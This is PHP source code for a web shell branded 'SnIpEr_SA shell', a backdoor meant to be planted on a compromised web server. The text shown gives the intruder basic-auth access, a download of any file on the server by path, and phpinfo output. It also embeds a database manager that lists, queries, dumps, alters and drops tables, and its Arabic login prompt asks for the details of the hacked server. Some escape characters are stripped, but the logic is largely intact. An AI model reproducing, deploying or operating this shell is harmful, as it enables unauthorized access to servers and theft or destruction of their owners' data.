$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="SnIpEr_SA shell"'); header('HTTP/1.0 401 Unauthorized'); exit("SnIpEr_SA : Access Denied"); } } $head = ' SnIpEr_SA shell '; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name="".$attach['name'].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach['content']))."rn"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; } return 0; } function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error'; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; } return 1; } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; } } } if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "
[ BACK ]
"; die(); } if(isset($_GET['sqlman'])) { session_start(); $action = $HTTP_GET_VARS['action']; $pagemax=20; // Maximum rows displaed per page, change to display more or less rows per page. function show_login($dbnamearray){ $hostdefault="localhost"; echo""; echo""; if(count($hostdefault) > 1){ echo"n"; }else{ echo"n"; } echo"n"; echo"n"; If($dbnamearray != ""){ echo"n"; echo"n"; echo"
??? C???????:
سيرفر قواعد البيانات:
اسم المستخدم:
كلمه المرور:
?C?IE C?E?C?CE:
n"; } function dbrestrict(){ if(isset($_SESSION['user'])){ $user=$_SESSION['user']; switch($user){ //Edit these ** values. You can add more case statements. case '**User**': $dbnamearray= array('**dbname**', '**dbname2**', '**dbname**'); break; //end edit values default: $_SESSION['defaltuser']=true; $dbnamearray = array(); $link = connectmysql(); $db_list = mysql_list_dbs($link); //$db_list $cnt = mysql_num_rows($db_list); for ($i =0; $i < $cnt; $i++) { $dbnamearray[$i]= mysql_db_name($db_list, $i); } } return $dbnamearray; } } //*************************************************************** //function showdbs($dbnamearray, $backuppath){ function showdbs($dbnamearray){ //$backuppath=addslashes($backuppath); echo"n"; for ($i =0; $i < count($dbnamearray); $i++) { echo"n"; } echo"
"; $dbn=$dbnamearray[$i]; $va="الذهاب الى قاعدة $dbn"; goto(' ', $dbn,$action, 'but', 'db', $va ); $dbs=mysize($dbnamearray[$i],""); echo"$dbs
n"; } //********************* Show Logout Button ********** function endsess(){ echo"
n"; echo"n"; echo"
"; } //******************************************************************** function connectmysql(){ //Connects to the MySQL Database. if (isset($_SESSION['user']) && isset($_SESSION['password'])){ $user = $_SESSION['user']; $pass = $_SESSION['password']; }else{ display_foot(); echo"nn"; exit(); } $link = @mysql_connect($_SESSION['host'], $_SESSION['user'], $_SESSION['password']); if(! $link){ echo"
n"; echo"Unable to connect to the database server.
"; echo"The Host: $_SESSION[host], اسم المستخدم: $user او الكلمه السريه خطاء.
"; echo"فضلاً سجل خروج للمحاوله مره اخرى.n"; echo"
n"; return false; exit(); } else{ return $link; } } //********************************************************************* function connectdb($db, $link){ if(! mysql_select_db($db,$link)){ echo"Unable to locate database $db.
Please try again later.n"; exit(); } } //********************************************************************* function exequery($sql, $tablename, $db){ $result= @mysql_query( $sql ); if($result){ //echo "Query successful"; return $result; }else{ echo"Sorry your Query failed: $sql
error:".mysql_error()."n"; return false; } } //*************************************************** $fieldtypes = array("BIGINT", "BLOB", "CHAR", "DATE", "DATETIME", "DECIMAL", "DOUBLE", "ENUM", "FLOAT", "INT", "INTEGER", "LONGBLOB", "LONGTEXT", "MEDIUMBLOB", "MEDIUMINT", "MEDIUMTEXT", "NUMERIC", "PRECISION", "REAL","SET", "SMALLINT", "TEXT", "TIME", "TIMESTAMP", "TINYBLOB", "TINYINT", "TINYTEXT", "VARCHAR", "YEAR" ); //****************** Search Form **************************** function searchtableform($tablename, $dbname){ echo"
n"; echo"n"; echo"n"; echo"n"; echo"n"; echo"
n"; } //********************* Search ************************* function searcht($tablename, $dbname, $searchval){ if(! empty($searchval)){ // $searchval= str_replace(";",' ', $searchval); $result=exequery("Select * from $tablename", $tablename, $dbname); //$result=mysql_query("Select * from $tablename"); $num = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); $whr="where "; $tok=explode(" ",$searchval); for ($t =0; $t < count($tok); $t++){ for ( $c = 0; $c < $num; $c++){ $fn =mysql_field_name($fields, $c); $whr .=" $fn like '%$tok[$t]%' or "; } } $whr=trim(substr_replace($whr, " ", -3)); $query="Select * from $tablename $whr"; $result=exequery($query, $tablename, $dbname); return $result; } } //*********************GOTO buttons************************* //provides a form and button. function goto($tablename, $dbname, $action, $class, $name, $va ){ //Adds a button. echo"
n"; if(! eregi('tablestart', $name)){ echo"n"; echo"n"; } echo"n"; //echo""; echo"
n"; //echo"$va"; //} } //*********************** ShowDB *********************************** function showdb(){ //function showdb($backuppath){ $link=connectmysql(); if ($link){ echo"
"; echo"
n"; echo"

إنشاء قاعدة جديدة

n"; echo"
n"; echo"أسم القاعدة الجديدة: n"; echo"

n"; echo"

"; echo"
"; echo"

قائمه القواعد المتوفره

n"; //Restrict the database for users $dbnamearray= dbrestrict(); showdbs($dbnamearray); echo"
"; } } //********************** BuildWhr ****************************** //Builds the Where part of queries. function buildwhr($pk, $pv){ $whr=""; $pn =count($pv); for($t =0; $t < $pn; $t++){ $whr.="$pk[$t]='$pv[$t]'"; if($t < $pn-1){ $whr.=" and "; } } if ($whr !=" "){ return $whr; }else{ return false; } } //***********************ADD Record ****************** function addrecord($tablename, $dbname, $array){ $result=exequery("Select * from $tablename", $tablename, $dbname); //$result = @mysql_query( "Select * from $tablename" ); $flds = mysql_num_fields($result); //$fields = mysql_list_fields($dbname, $tablename); $qry=" "; $query = "Insert into $tablename Values( "; for ($x =0; $x < $flds; $x++){ //Multiple Select values for SET if(is_array($array[$x])){ $mval=""; for($m=0; $m < count($array[$x]); $m++){ if($m+1 == count($array[$x])){ $mval.= AddSlashes($array[$x][$m]); }else{ $mval.= AddSlashes($array[$x][$m]).","; } $fval = $mval; } }else{ $fval = AddSlashes($array[$x]); } $qry .= "'$fval'"; if ($x < $flds-1){ $qry.= ", "; } } $query .= $qry.")"; // echo"qry: $qry"; $result=exequery($query, $tablename, $dbname); if($result){ return $result; }else{ return false; } } //**********************ADD Form ********************** function addform($tablename, $dbname){ //Display the field names and input boxes echo"
n"; echo"n"; echo"n"; $result=exequery("Select * from $tablename", $tablename, $dbname); //$result = @mysql_query( "Select * from $tablename" ); $flds = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); echo"n"; echo"n"; echo"n"; $mxlen = 80;//max width of the form fields. for($i=0; $i < $flds; $i++){ $auto = "false"; echo "n"; }elseif($flen > $mxlen){ $rws= $flen/$mxlen; if($rws>10){ $rws=10; //max length of textarea } echo"n"; // Start of new code for set drop down }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){ // We have a field type of set or enum $num=substr_count($arr[1],',') + 1; // count the number of entries $pos=strpos($arr[1],'(' ); //find the position of '(' $newstring=substr($arr[1],$pos+1); // get rid of the '???(' $snewstring=str_replace(')','',$newstring); // get rid of the last ')' $nnewstring=explode(',',$snewstring,$num); // stick into an array if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values echo ""; echo""; echo"n"; // End of new code block for set drop down }else{ echo"n"; } } echo"n"; echo"n"; echo""; echo"
Field NameTypeValue
".mysql_field_name($fields, $i); $fieldname = mysql_field_name($fields, $i); // added $type = mysql_field_type($result, $i); $flen = mysql_field_len($result, $i);//length of the field $flagstring = mysql_field_flags ($result, $i); // Start of new code for set drop down $newsql = "show columns from $tablename like '%".$fieldname."'"; $newresult = exequery($newsql, $tablename, $dbname); //mysql_query($newsql) or die ('I cannot get the query because: ' . mysql_error()); $arr=mysql_fetch_array($newresult); // End of new code block for set drop down if (eregi("primary",$flagstring )){ $type .= " PK "; } if(eregi("auto",$flagstring )){ $type .= " auto_increment"; $auto = "true"; } if ($auto=="true"){ echo"$type
$type
Set (select one or more)Enum
$type
n"; echo"
n"; } //*********************Edit Form *************** function editform($tablename, $dbname, $result, $edit, $pk, $pv){ $row=mysql_fetch_array($result); echo"
n"; echo"n"; $flds = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); echo"n"; echo"n"; echo""; $mxlen = 80;//max width of the form fields for($i=0; $i < $flds; $i++){ $fname=mysql_field_name($fields, $i); echo "n"; // Start of new code for set drop down }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){ // We have a field type of set or enum $num=substr_count($arr[1],',') + 1; // count the number of entries $pos=strpos($arr[1],'(' ); //find the position of '(' $newstring=substr($arr[1],$pos+1); // get rid of the '???(' $snewstring=str_replace(')','',$newstring); // get rid of the last ')' $nnewstring=explode(',',$snewstring,$num); // stick into an array if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values echo"n"; // End of new code block for set drop down }else{ echo"n"; } for($f =0; $f< count($pk);$f++){ echo""; echo"n"; } } echo"n"; echo"n"; echo""; echo"
$fname"; $flen = mysql_field_len($result, $i);//length of the field $nslash = StripSlashes($row[$i]); // Start of new code for set drop down $newsql = "show columns from $tablename like '%".$fname."'"; $newresult = exequery($newsql, $tablename, $dbname); $arr=mysql_fetch_array($newresult); // End of new code block for set drop down if($flen > $mxlen){ $rws= $flen/$mxlen; if($rws>10){ $rws=10; //max length of textarea } echo"
n"; echo"
n"; } //************************Edit Record************************* function editrec($dbname, $tablename, $pk, $pv, $array){ //$result = @mysql_query( "Select * from $tablename" ); $result = exequery("Select * from $tablename", $tablename, $dbname); $flds = mysql_num_fields($result); $fields = mysql_list_fields($dbname, $tablename); //Build Query $qry=""; $query = "UPDATE $tablename set "; for ($x =0; $x < $flds; $x++){ $fie = mysql_field_name($fields, $x ); // SET and ENUM if(is_array($array[$x])){ $mval=""; for($m=0; $m < count($array[$x]); $m++){ if($m+1 == count($array[$x])){ $mval.= AddSlashes($array[$x][$m]); }else{ $mval.= AddSlashes($array[$x][$m]).","; } $fval = $mval; } }else{ $fval = AddSlashes($array[$x]); } //************************** //$fval = AddSlashes($array[$x]); $qry .= "$fie = '$fval'"; if ($x < $flds-1){ $qry.= ", "; } } $whr = buildwhr( $pk, $pv); $whr =StripSlashes($whr); $query .= "$qry"; $query .= " where $whr"; $result=exequery($query, $tablename, $dbname); if($result){ return $result; }else{ return false; } } //****************** Number of Primary Keys *********************** function numpk($result){ $z =0; for ($i = 0; $i < $flds; $i++) { //Find the primary key $flagstring = mysql_field_flags ($result, $i); if(eregi("primary",$flagstring )){ $z++; } } return $z; } //********************Size field***************** function fieldformsize($ft, $i, $l){ $ft= trim(strtoupper($ft)); if($ft =="DATE" || $ft=="TIME" || $ft== "DATETIME" ){ }elseif( $ft=="TINYTEXT" || $ft=="BLOB" || $ft=="TEXT" || $ft =="MEDIUMBLOB"){ echo""; }elseif($ft=="MEDIUMTEXT" || $ft=="LONGBLOB"|| $ft=="LONGTEXT" || $ft=="TINYBLOB"){ echo""; }elseif($ft=="INT" || $ft=="TINYINT"|| $ft=="SMALLINT"|| $ft=="MEDIUMINT"|| $ft=="BIGINT" || $ft=="INTEGER"){ echo""; }elseif($ft=="YEAR" ){ echo"n"; }elseif($ft=="SET"|| $ft=="ENUM"){ echo""; }else{ echo"n"; } } //******************************Display Row ****************************** function displayrow($dbname, $tbl, $pk, $pkfield, $cpk, $row, $flds){ $pkfs=""; $hv=""; $hf=""; if($cpk >0 && !empty($pkfield)){ for($a = 0; $a < $cpk; $a++){ $fieldn = $pkfield[$a]; $hf .= ""; $hv .= ""; } }else{ //No Primary Key so use all fields $fields = mysql_list_fields($dbname, $tbl); for($b = 0; $b < $flds; $b++){ $fie = mysql_field_name($fields, $b ); $hf .= ""; $hv .= ""; } } echo"n"; //edit Record echo"
n"; echo"n"; echo"n"; echo"n"; echo"$hf"; echo"$hv"; echo"n"; echo"
n"; //Delete record echo"
n"; echo"n"; echo"n"; echo"n"; echo"$hf"; echo"$hv"; echo"n"; echo"
"; //Display all the columns. for($col = 0; $col < $flds; $col ++){ $nslash = StripSlashes($row[$col]); echo"$nslash"; } echo""; } //***********************Remove Array Copy******************************** //removes copies from an array $x. function removearraycopy($x){ $leng= count($x); sort($x); $farr=array(); for ($i =0; $i < $leng; $i++){ $flag=false; for ($s =0; $s < count($farr); $s++){ if($x[$i]==$farr[$s]){ $flag=true; } } if ($flag == false){ $farr[count($farr)] = $x[$i]; } } return $farr; } //***********************<< page position >>******************************** function whichpage($num_rows, $pagemax, $pg, $tablename, $searchval){ $pgs = $num_rows/$pagemax; $pgs=ceil($pgs); //round up the number of pages. echo"
n"; echo"Total number of records $num_rows, displayed on $pgs pages of n"; echo" n"; echo"n"; echo"n"; echo"records per page.
n"; $pagescrol=""; $sval=""; if($pgs >1){ $pagescrol="
n"; $nxt=$pg+1; $bk=$pg-1; $lst=$pgs; $end=$lst-1; $showp=$pg+1; if($searchval !=""){ $sval="&searchval=$searchval"; } $pagescrol .= "
n"; if($pg>=1){ $pagescrol .= " 1 :<< n"; $pagescrol .= " < n"; } $pagescrol .= "n"; $pagescrol .= "n"; $pagescrol .= "n"; $pagescrol .= "n"; if($showp < $lst){ $pagescrol .= " > n"; $pagescrol .= " >>: $lst n"; } $pagescrol .= "
n"; $pagescrol.="
n"; } return $pagescrol; } //*************Display Footer************************* //Please don't remove or change. function display_foot(){ echo"
Version $version © ".date('Y')." SnIpEr_SA
"; } //*************My Size************************* //Returns the size of a table or database function mysize($dbname, $tablename){ $like=""; $total=""; $t=0; if($tablename !=""){ $like=" like '$tablename'"; } $sql= "SHOW TABLE STATUS FROM $dbname $like"; //$result = mysql_query($sql); $result=exequery($sql, $tablename, $dbname); if($result){ while($rec = mysql_fetch_array($result)){ $t+=($rec['Data_length'] + $rec['Index_length']); } $total ="$t bytes"; }else{ $total="Unknowen"; } return($total); } //************************************** //DEBUG to show all being passed to the page function showpassingvars(){ echo"Get: "; foreach($_GET as $pram=>$value){ echo"$pram: $value, "; } echo"
Post: "; foreach($_POST as $pram=>$value){ echo"$pram: $value, "; } echo"
Session: "; foreach($_SESSION as $pram=>$value){ echo"$pram: $value, "; } } echo"n"; echo"n"; echo"n"; echo"سكربت الاتصال بقواعد البياناتn"; echo"n"; echo""; echo"سكربت الاتصال بقواعد البياناتn"; echo""; echo""; echo""; echo"n"; echo"n"; echo"n"; $showall=true; echo"

سكربت الاتصال بقواعد البيانات

n"; //******************* Session Logon *********************** if(isset($_POST['logout'])){ $_POST['dbname']=""; session_unset(); session_destroy(); } if(isset($_POST['userid']) && isset($_POST['pword1'])){ $_SESSION['user'] = $_POST['userid']; $_SESSION['password'] = $_POST['pword1']; } if (!isset($_SESSION['user']) || !isset($_SESSION['password'])){ echo"
"; echo"

ادخل بيانات السيرفر المخترق

n"; If(!isset($dbnamearray)){ $dbnamearray=""; } show_login($dbnamearray); echo"
"; }else{ //show logout option. echo"
"; endsess(); echo"
"; } //*****dbname if(isset($_POST['dbname'])){ $dbname=$_POST['dbname']; $_SESSION['dbname']= $_POST['dbname']; } //***** Host if(isset($_POST['host'])){ $host=$_POST['host']; $_SESSION['host']=$_POST['host']; } //******set tablename if(isset($_GET['tablename']) ){ $tablename=$_GET['tablename']; }elseif(isset($_POST['tablename'])){ $tablename=$_POST['tablename']; } //********** pagemax if(isset($_POST['pagemax'])){ //&& is_int($_POST['pagemax'])){ $isnum=true; for($o=0; $o9){ $isnum=false; } } if($_POST['pagemax']>0 && $isnum){ $_SESSION['pagemax']=$_POST['pagemax']; } } if(isset($_SESSION['pagemax'])){ $pagemax=$_SESSION['pagemax']; } //******** create a new Database ************ if(isset($_POST['cndb'])){ connectmysql(); $sql="create database $_POST[ndbname]"; $result=exequery($sql, " ", $_POST['ndbname']); if ($result){ $_SESSION['dbname'] = $_POST['ndbname']; $sql="Use $_POST[ndbname]"; $result=exequery($sql, " ", $_POST['ndbname']); if($result){ echo"

قاعدة جديدة $_SESSION[dbname]

n"; } } } //********************************************* if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ //*********post //Databse names showdb(); } //************************ Choose DB ************* if(isset($_POST['dbname']) && $_POST['dbname']==""){ showdb(); } //********** if (isset($_SESSION['dbname']) || isset($_POST['dbna']) || isset($_POST['dbname'])){ //************************************* //connection if (isset($_SESSION['dbname'])){ $dbsetname = $_SESSION['dbname']; }elseif(isset($_POST['dbname'])){ $dbsetname = $_POST['dbname']; $_SESSION['dbname'] = $_POST['dbname']; }else{ $dbsetname = $_POST['dbna']; $_SESSION['dbname'] = $_POST['dbna']; } } //*************************** we have a DB set if(isset($dbsetname) && $dbsetname!=""){ $link= connectmysql(); //echo"DBS: $dbsetname"; $conn = connectdb($dbsetname, $link); //*********** Drop Table ************** if(isset($_POST['deltable'])){ $showall=false; $tablename=$_POST['tablename']; echo"

!!! تحذير !!!
انت تحاول مسح هذا الجدول $tablename
"; echo"هل انت متاكد من القيام بالعمليه؟?

n"; $va="Drop $tablename"; goto($tablename, $dbname,$action, 'del', 'droptab', $va ); } if(isset($_POST['droptab'])){ $tablename=$_POST['tablename']; $dsql = "drop table $tablename"; $result=exequery($dsql, $tablename, $dbname); unset($tablename); //="false"; unset($_POST['tablename']); } //*****************Write Your Own Query ***************** if(isset($_POST['wyoq'])){ //post $value="الواجهه الرئيسيه للسكربت"; goto($tablename, $dbname, $action, 'but', 'start', $value ); echo"
n"; echo"n"; //echo"n"; echo"n"; echo"
n"; echo"

n"; } if(isset($_POST['runquery'])){ $wyoqta = StripSlashes($_POST['wyoqta']); $result=exequery($wyoqta, " ", " "); if(@mysql_num_rows($result) >0){ $numrows=mysql_num_rows($result); $flds=mysql_num_fields($result); echo""; for($r=0; $r < $numrows; $r++){ echo""; $row=mysql_fetch_array($result); for($col = 0; $col < $flds; $col ++){ $nslash = StripSlashes($row[$col]); echo""; } echo""; } echo"
$nslash
"; }elseif (mysql_affected_rows()){ echo" Number of Rows affected: ".mysql_affected_rows(); }else{ echo" Nothing returned from the query."; } } // ****************List Tables*************************** if( ! isset($tablename) || $tablename==" " ){ $dbname=$_SESSION['dbname']; $result = mysql_list_tables($_SESSION['dbname']); $numtab = mysql_num_rows ($result); if($numtab == 1){ $_SESSION['tablename'] =mysql_tablename($result, 0); } //***************** Buttons ****************************** if (isset($_POST['runquery'])){ $dbname=$_SESSION['dbname']; $value="$dbname Start"; //Table Manager Start goto("", $_SESSION['dbname'], $action, 'but', 'tablestart', $value ); }elseif (! isset($_POST['wyoq']) && ! isset($_POST['runquery'])){ //write your own query. echo"n"; echo"n"; $value="Write Your Own Query"; goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value ); echo""; echo"
"; $va="إنشاء جدول جديد"; goto("", $_SESSION['dbname'], "create.php", 'but', 'create', $va ); // echo"Create new Tablen"; echo""; $value="الواجهه الرئيسيه"; //Choose DB goto("", "", $action, 'but', 'db', $value ); echo"




"; echo"n"; for ($i =0; $i < $numtab; $i++) { $tb_names[$i] = mysql_tablename($result, $i); echo"n"; }//for echo"
n"; $va="عرض جدول * $tb_names[$i]"; goto($tb_names[$i], $_SESSION['dbname'],$action, 'but', $tb_names[$i], $va ); echo"n"; $va="مسح جدول $tb_names[$i]"; goto($tb_names[$i], $_SESSION['dbname'],$action, 'del', 'deltable', $va ); echo"n"; $va="Alter Table $tb_names[$i]"; goto($tb_names[$i], $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va ); echo"n"; searchtableform($tb_names[$i], $_SESSION['dbname']); echo""; //Table size in bytes echo mysize($_SESSION['dbname'],$tb_names[$i]); echo"
n"; } }else{ //tablename is set //***************** menu ***************************************** echo"n"; echo"n"; echo"n"; if (!isset($_POST['add']) && !isset($_POST['deltable']) && isset($tablename)){ echo"n"; } if (!isset($_POST['deltable'])){ echo"n"; } echo"
n"; $value="$_SESSION[dbname] Start"; //Ex Table Manager Start goto($tablename, $_SESSION['dbname'], $action, 'but', 'tablestart', $value ); echo"n"; $value="الواجهه الرئيسيه"; //Choose DB goto("", "", $action, 'but', 'start', $value ); echo"n"; $value="Write Your Own Query"; goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value ); echo""; //$tablename = $_POST['tablename']; $va="Add a $tablename Record"; goto($tablename, $_SESSION['dbname'], 'alter.php', 'but', 'add', $va ); echo"n"; searchtableform($tablename, $_SESSION['dbname']); echo"
n"; echo"
